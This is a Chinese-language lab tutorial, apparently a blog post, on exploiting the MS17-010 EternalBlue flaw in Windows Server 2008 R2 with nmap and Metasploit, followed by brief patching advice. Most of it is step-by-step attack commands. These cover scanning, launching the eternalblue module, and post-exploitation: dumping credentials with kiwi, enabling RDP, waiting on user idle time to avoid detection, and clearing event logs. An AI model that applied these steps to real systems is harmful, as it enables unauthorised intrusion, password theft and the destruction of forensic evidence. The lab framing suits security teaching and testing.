MS17-010（Eternal blue永恒之蓝）漏洞利用+修复方法

---

前言

提到操作系统漏洞，大家肯定听说过耳熟能详的永恒之蓝（MS17-010）了，他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞“EternalBlue”（永恒之蓝）进行传播 。勒索病毒肆虐，俨然是一场全球性互联网灾难，给广大电脑用户造成了巨大损失。最新统计数据显示，100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。

---

0x01 准备工作

• 靶机：Windows server 2008R2(IP:192.168.178.128)
• 攻击机：Kali 2020(IP:192.168.178.131)
• 工具：namap（这里主要用于漏洞扫描，也可以使用nussus等其他工具）、metasploit(msf)

0x02 漏洞利用

用nmap的漏洞扫描模式

nmap --script=vuln 192.168.178.128

可以发现，靶机上扫到了4个漏洞，其中包括了MS17-010。

打开metasploit（msf很有意思的是,每次打开都会显示不同的画面。）

msfconsole

搜索ms17-010相关模块，可以看到一共找到了6个不同的模块。（选项：0-5）

search ms17-010

加载扫描模块。（选项1）

use auxiliary/scanner/smb/smb_ms17_010

查看配置选项

show options

RHOSTS显示远程主机未配置，配置目标主机。

set rhosts 192.168.178.128

开始扫描漏洞，再次证实靶机存在MS17-010漏洞。

exploit

使用永恒之蓝攻击模块：exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷：

set payload

查看选项并设置rhosts:

set rhosts 192.168.178.128

输入exploit开始攻击。

运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块，可以调用 Metasploit 的一些功能，
对目标系统进行更深入的渗透，如获取屏幕、上传/下载文件、创建持久后门等。

演示几个功能

1. 捕获屏幕

 meterpreter > screenshot

2. 上传/下载文件

meterpreter > upload hello.txt c://

meterpreter > download d://1.txt

3. 远程桌面

meterpreter > run vnc 

启动失败了- -好像是靶机没有启动vnc服务。

4. 获取cmd,出现了编码问题。

meterpreter > shell

5. 获取用户密码

meterpreter > load kiwi 
Loading extension kiwi...Success. 

Kiwi在32位系统中能够正常使用，到了64位系统中需要用到进程迁移
进程迁移请参考：http://hackdig.com/09/hack-144260.htm

完成进程迁移后:

meterpreter > creds_all

6. 启用远程桌面，配合上一步获取到的密码。

meterpreter > run post/windows/manage/enable_rdp

使用时一般配合查看远程用户的空闲时长，空闲时间长再进行远程登陆，减小被发现的风险。登录rdp会把对方顶掉。

meterpreter > idletime

使用 rdesktop 命令远程连接桌面

root@kali:~# rdesktop 192.168.2.6

用上一步获取的账户密码进行登录，登录成功。

7. 清除日志

meterpreter > clearev

清除日志前，靶机的事件查看器是这样的。（记录了大量的事件）


被清空了~

还有很多功能选项，可以自己去查一下，就不全部罗列出来了。

0x03 修复方案

受影响的系统版本可以参照：https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

• 关闭445端口。
• 打开防火墙，安装安全软件。
• 安装对应补丁。

总结

为了维持操作系统的安全，我们能做到的是及时更新，安装补丁，关闭不必要的服务和端口。